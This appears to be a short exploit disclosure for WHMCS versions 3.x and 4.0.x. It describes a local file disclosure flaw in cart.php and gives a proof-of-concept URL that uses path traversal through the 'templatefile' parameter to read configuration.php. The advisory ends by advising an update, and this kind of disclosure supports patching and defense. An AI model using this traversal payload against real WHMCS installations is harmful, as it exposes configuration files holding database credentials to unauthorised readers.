WHMCompleteSolution (cart.php) Local File Disclosure
# Title : WHMCompleteSolution (cart.php) Local File Disclosure |
# Product : WHMCS ( WHMCompleteSolution ) |
# Vendor : http://whmcs.com/ |
# Version : 3.x.x , 4.0.x |
# Tested on : linux+apache |
================================================================ |
$templatefile = "configureproductdomain"; |
outputClientArea( $templatefile, $nowrapper ); |
# outputClientArea function will display |
"./templates/orderforms/cart/{$templatefile}.tpl" |
if variable "$a" has a true value .. will set "$templatefile" value by |
but when "$a" value didn't match the defaults values |
you can control "$templatefile" and use it as ( File Disclosure ) |
http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD] |
http://domain.tld/[PATH]/cart.php?a=test&templatefile=../../../configuration.php |
note* : show the page source to see Disclosure file. |
update to the last version |
================================================================ |
Greetz To All www.Sec4ever.com Members. |
No comments:
Post a Comment